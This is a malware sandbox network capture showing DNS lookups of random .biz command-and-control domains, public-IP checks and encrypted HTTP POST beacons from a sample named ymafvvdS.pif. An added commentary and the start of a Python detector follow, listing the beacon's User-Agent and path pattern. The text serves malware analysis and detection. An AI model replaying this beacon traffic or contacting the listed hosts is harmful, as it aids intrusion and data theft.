Dec 10, 2024 07:05:39.035650969 CET | 192.168.2.9 | 1.1.1.1 | 0xe26 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:40.504946947 CET | 192.168.2.9 | 1.1.1.1 | 0xe499 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:41.095743895 CET | 192.168.2.9 | 1.1.1.1 | 0x541a | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:42.900322914 CET | 192.168.2.9 | 1.1.1.1 | 0x1613 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:42.927993059 CET | 192.168.2.9 | 1.1.1.1 | 0x4c43 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:44.514067888 CET | 192.168.2.9 | 1.1.1.1 | 0xf99 | Standard query (0) | ww99.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:44.593676090 CET | 192.168.2.9 | 1.1.1.1 | 0x1e7c | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:45.895601988 CET | 192.168.2.9 | 1.1.1.1 | 0xc962 | Standard query (0) | webmail.thematman.com.au | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:46.083996058 CET | 192.168.2.9 | 1.1.1.1 | 0xd53 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:52.314101934 CET | 192.168.2.9 | 1.1.1.1 | 0x998a | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:52.319698095 CET | 192.168.2.9 | 1.1.1.1 | 0x8fa1 | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:54.011379957 CET | 192.168.2.9 | 1.1.1.1 | 0xc1ff | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:54.224970102 CET | 192.168.2.9 | 1.1.1.1 | 0xb6f9 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:56.092195034 CET | 192.168.2.9 | 1.1.1.1 | 0xf068 | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:56.230613947 CET | 192.168.2.9 | 1.1.1.1 | 0xdfc4 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:56.884445906 CET | 192.168.2.9 | 1.1.1.1 | 0x841c | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:57.108449936 CET | 192.168.2.9 | 1.1.1.1 | 0xa868 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:57.324650049 CET | 192.168.2.9 | 1.1.1.1 | 0x5924 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:58.320677996 CET | 192.168.2.9 | 1.1.1.1 | 0x5924 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:58.645046949 CET | 192.168.2.9 | 1.1.1.1 | 0xd307 | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:58.783714056 CET | 192.168.2.9 | 1.1.1.1 | 0x985a | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:58.924352884 CET | 192.168.2.9 | 1.1.1.1 | 0x8e23 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:06:42.456146955 CET | 192.168.2.9 | 1.1.1.1 | 0x578a | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:06:44.169616938 CET | 192.168.2.9 | 1.1.1.1 | 0xa1e5 | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 07:05:21.528405905 CET | 1.1.1.1 | 192.168.2.9 | 0x5658 | No error (0) | lwaziacademy.com | | 41.185.8.252 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:21.528434038 CET | 1.1.1.1 | 192.168.2.9 | 0x5658 | No error (0) | lwaziacademy.com | | 41.185.8.252 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.531740904 CET | 1.1.1.1 | 192.168.2.9 | 0x1751 | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.613818884 CET | 1.1.1.1 | 192.168.2.9 | 0xcc9f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 07:05:34.613818884 CET | 1.1.1.1 | 192.168.2.9 | 0xcc9f | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.613818884 CET | 1.1.1.1 | 192.168.2.9 | 0xcc9f | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.613818884 CET | 1.1.1.1 | 192.168.2.9 | 0xcc9f | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.613818884 CET | 1.1.1.1 | 192.168.2.9 | 0xcc9f | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:34.613818884 CET | 1.1.1.1 | 192.168.2.9 | 0xcc9f | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:36.762520075 CET | 1.1.1.1 | 192.168.2.9 | 0xd997 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:36.762520075 CET | 1.1.1.1 | 192.168.2.9 | 0xd997 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:36.805236101 CET | 1.1.1.1 | 192.168.2.9 | 0xbe6b | No error (0) | ssbzmoy.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:38.900460005 CET | 1.1.1.1 | 192.168.2.9 | 0x8e2d | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:05:39.509748936 CET | 1.1.1.1 | 192.168.2.9 | 0xe26 | No error (0) | cvgrf.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:40.642160892 CET1.1.1.1192.168.2.90xe499No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:41.576323986 CET1.1.1.1192.168.2.90x541aNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.038377047 CET1.1.1.1192.168.2.90x1613No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.253587961 CET1.1.1.1192.168.2.90x4c43No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:43.253587961 CET1.1.1.1192.168.2.90x4c43No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.730432034 CET1.1.1.1192.168.2.90x1e7cNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:44.743771076 CET1.1.1.1192.168.2.90xf99No error (0)ww99.przvgke.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.221590996 CET1.1.1.1192.168.2.90xd53No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.221590996 CET1.1.1.1192.168.2.90xd53No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:46.445831060 CET1.1.1.1192.168.2.90xc962No error (0)webmail.thematman.com.au103.20.200.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET1.1.1.1192.168.2.90x998aNo error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET1.1.1.1192.168.2.90x998aNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.713200092 CET1.1.1.1192.168.2.90x998aNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.760778904 CET1.1.1.1192.168.2.90x8fa1No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.760778904 CET1.1.1.1192.168.2.90x8fa1No error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.223753929 CET1.1.1.1192.168.2.90xc1ffName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.697482109 CET1.1.1.1192.168.2.90xb6f9No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.229682922 CET1.1.1.1192.168.2.90xf068Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.367852926 CET1.1.1.1192.168.2.90xdfc4No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.107588053 CET1.1.1.1192.168.2.90x841cName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:57.323951006 CET1.1.1.1192.168.2.90xa868Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.339792013 CET1.1.1.1192.168.2.90x5924No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.457187891 CET1.1.1.1192.168.2.90x5924No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.782947063 CET1.1.1.1192.168.2.90xd307Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.923464060 CET1.1.1.1192.168.2.90x985aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.061625957 CET1.1.1.1192.168.2.90x8e23No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:06:43.388295889 CET1.1.1.1192.168.2.90x578aNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.307065964 CET1.1.1.1192.168.2.90xa1e5No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
• lwaziacademy.com
• reallyfreegeoip.org
• pywolwnvd.biz
• checkip.dyndns.org
• ssbzmoy.biz
• cvgrf.biz
• npukfztj.biz
• przvgke.biz
• ww99.przvgke.biz
• ww12.przvgke.biz
• ww7.przvgke.biz
• knjghuig.biz
• lpuegx.biz
• vjaxhpbji.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49709 | 54.244.188.177 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:34.720594883 CET | 350 | OUT | POST /nimjw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Dec 10, 2024 07:05:34.720594883 CET | 802 | OUT | Data Raw: b5 c1 9b 81 1f 42 13 60 16 03 00 00 66 ba a4 50 af c0 50 f2 ca 02 8c a2 99 b4 dc 45 d1 f5 a5 62 ba cf 73 0f 7b 95 db c2 49 97 67 d8 53 28 67 e3 00 13 e4 92 7c e0 fd 63 f1 74 c3 5c 58 49 7b fd 47 cb eb 96 c7 76 39 2a 5f ff 07 d6 ed 55 b6 b6 32 b6
    Data Ascii: B`fPPEbs{IgS(g|ct\XI{Gv9*_U2[5J=w^QWV\khOcW$"i(;(w=rdn9H }BYN{m$MIx'JLirV$Kq~~1f
Dec 10, 2024 07:05:36.061935902 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:35 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=68d67ed680651f244aab0a09a47772a7|8.46.123.228|1733810735|1733810735|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49710 | 158.101.44.242 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:34.749125004 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 10, 2024 07:05:35.985436916 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 06:05:35 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 508cd42645da4c9f619d8e5a8af07ce4
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 10, 2024 07:05:36.171304941 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 10, 2024 07:05:36.547095060 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 06:05:36 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 7d0fb38e2d90ffe7dac24b8f7130ae34
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 10, 2024 07:05:45.488719940 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 10, 2024 07:05:45.862093925 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 06:05:45 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 27a89da4e72b6cbf58995bfc17fed7d6
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


Session ID: 2 | Source IP: 192.168.2.9 | Source Port: 49713 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 7996 | Process: C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:36.974234104 CET | 346 | OUT | POST /jae HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Dec 10, 2024 07:05:36.974292040 CET | 802 | OUT | Data Raw: 02 82 ad 59 40 75 07 f1 16 03 00 00 af a1 08 5a 48 0d b9 52 84 09 62 42 46 a6 f8 54 97 e5 52 40 69 a0 1e 1b cc 34 7e eb 14 91 0a b5 71 05 65 5b 12 69 8c b4 71 7e e2 76 2c dc de 02 82 c5 bf f6 d9 22 c7 59 d1 92 de 00 e7 8e 9b 7f fd f8 cf 13 af 29
    Data Ascii: Y@uZHRbBFTR@i4~qe[iq~v,"Y)7Z6>Vp0:_2T;1<Z\x^`#%dJO3bSbmJ$/z|y}\>)Uay&1X>m*AFB)4yp$bM<zM3z
Dec 10, 2024 07:05:39.014857054 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=f435a1d2f0e2efd83fa870afa4fc631b|8.46.123.228|1733810738|1733810738|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.9 | Source Port: 49715 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 7276 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:39.074668884 CET | 348 | OUT | POST /kka HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 10, 2024 07:05:39.074693918 CET | 778 | OUT | Data Raw: b8 1d 04 bc 3f e1 e7 c0 fe 02 00 00 57 1b 24 a4 22 8c cf 0a 12 a7 82 a1 55 ca bd f0 fa 37 24 20 66 74 ab 6b a0 ac b4 a1 6c e9 46 d7 b6 31 99 7a d5 f2 3a 9d 6b e3 2e 6b 7a b8 4c 98 d5 02 cc 0e 5c 25 df 05 a4 20 21 31 e4 0c 92 ab 5c ae de 4e 3b 38
    Data Ascii: ?W$"U7$ ftklF1z:k.kzL\% !1\N;8)6zpQ Z.m<?sNSG\/9*:Wz;D0)4JM?}&Q(32}E_N:_oP4G.*{'knM|W
Dec 10, 2024 07:05:40.414022923 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=dd794f5222cebeedcd6471706afb475b|8.46.123.228|1733810740|1733810740|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.9 | Source Port: 49717 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 7996 | Process: C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:39.656440020 CET | 345 | OUT | POST /fapn HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Dec 10, 2024 07:05:39.656440020 CET | 802 | OUT | Data Raw: 4b c6 79 24 48 1f c3 8e 16 03 00 00 1c a9 0f 79 a0 e9 b4 a4 df bc 0a 5a a9 6e 95 31 38 7a 3d 8e 4f 0b fc 97 63 43 84 e1 db 8f d7 bf 6a 7e 96 8e 88 21 82 30 25 03 b6 25 96 22 bd d6 c5 e8 6a ed 5b 86 f9 64 a2 fa 5a b1 7d c7 1a b4 fa 24 80 b7 9c b1
    Data Ascii: Ky$HyZn18z=OcCj~!0%%"j[dZ}$K@V;%'#6yUc4zCe%P~"lQjETMFj1zq\`xT&*A,l1iW&uhU;zZa4ti+]nx7RoSi4i6ijXyXe3)vh
Dec 10, 2024 07:05:40.996707916 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b6241afb6f0e7a61be300cb479982f9f|8.46.123.228|1733810740|1733810740|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.9 | Source Port: 49718 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 7276 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:40.804321051 CET | 356 | OUT | POST /fupmvmgjbhmts HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 10, 2024 07:05:40.804337978 CET | 778 | OUT | Data Raw: 22 2d 3a f5 cf 12 06 63 fe 02 00 00 21 ca 47 8a 89 f0 fe 05 e5 54 a6 c0 08 45 30 a5 92 2d ff 93 e7 56 e0 6a ca 1f 8f 77 88 54 27 0f dd c7 af 8f a1 b9 66 a8 74 ed 5e 81 e7 af 62 41 77 e5 30 c9 7b 6a 41 e1 45 2f 5d 1c 89 e6 d6 d7 5b 48 a0 ff c3 09
    Data Ascii: "-:c!GTE0-VjwT'ft^bAw0{jAE/][H/.Fiy^MsuwAS|H6|qe<bM?Cv,:tV["*lSTS0fFqHiPY]8@0W1`
Dec 10, 2024 07:05:42.842129946 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=34b0590def71f49f74c10f5480a5b016|8.46.123.228|1733810742|1733810742|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.9 | Source Port: 49719 | Destination IP: 44.221.84.105 | Destination Port: 80 | PID: 7996 | Process: C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:41.822365046 CET | 359 | OUT | POST /xujrrbphgxpfxye HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Dec 10, 2024 07:05:41.822403908 CET | 802 | OUT | Data Raw: 33 2c 8b 7d a6 a0 02 d8 16 03 00 00 45 e1 84 11 e8 2c 99 ec 6e b8 9a 8d 5a e5 ef 43 2f 72 6f cc 9f aa 29 2c 82 04 94 2e 7e a7 f1 e9 9e 50 ed 6c 4f 52 48 23 72 99 33 8c f9 ff f0 1a 05 33 a6 2d ab 35 d2 5a a0 b0 53 7a 83 cb fa 44 4d 62 3b 2a 75 8d
    Data Ascii: 3,}E,nZC/ro),.~PlORH#r33-5ZSzDMb;*u@p<|/*b&9od-T{&'u0,cK`%>r#%O~s>z$@\F*uy9c _\)S_4ZC>}L]F`}JEF\;
Dec 10, 2024 07:05:42.919414043 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=cbf3286d4089f0f57781e27b4d132dea|8.46.123.228|1733810742|1733810742|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
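
Every POST session above has the same shape: the sample (ymafvvdS.pif, and alg.exe, which the report also shows beaconing) first resolves its public IP via checkip.dyndns.org with an MSIE 6.0 User-Agent, then POSTs a small opaque body (Content-Length 778 or 802) with a fixed MicroMessenger/QQBrowser User-Agent to a short random lowercase path on a .biz host, and the nginx front end answers 200 with an empty chunked body and btst/snkz cookies that echo the client IP. In the leading bytes of every POST body shown here, bytes 8..11 read as a little-endian integer equal to Content-Length minus 12 (0x316 for 802, 0x2fe for 778). The Python below is an added example, not part of the Joe Sandbox report: it scores reconstructed request/response pairs against those indicators and gives a per-process verdict. SAMPLE_EXCHANGES is constructed from the headers on this page, with the encrypted payloads replaced by zero filler after their first 12 bytes; the host names, cookie values and process paths are those in the capture, while example.com and chrome.exe form a constructed benign control.

```python
"""Heuristic detection for the beacon pattern in the sessions above. Added example, not
part of the Joe Sandbox report; SAMPLE_EXCHANGES is constructed from the headers on this
page, with the encrypted POST bodies replaced by zero filler after their first 12 bytes."""
import re
from dataclasses import dataclass

# User-Agent sent verbatim by every POST beacon in the capture.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
IPCHECK_HOSTS = {"checkip.dyndns.org"}
RANDOM_PATH = re.compile(r"^/[a-z]{3,16}$")   # /jae, /kka, /fupmvmgjbhmts, ...


@dataclass
class HttpExchange:
    process: str     # image path of the process that opened the socket
    request: bytes   # raw request: start line, headers, blank line, body
    response: bytes  # raw response


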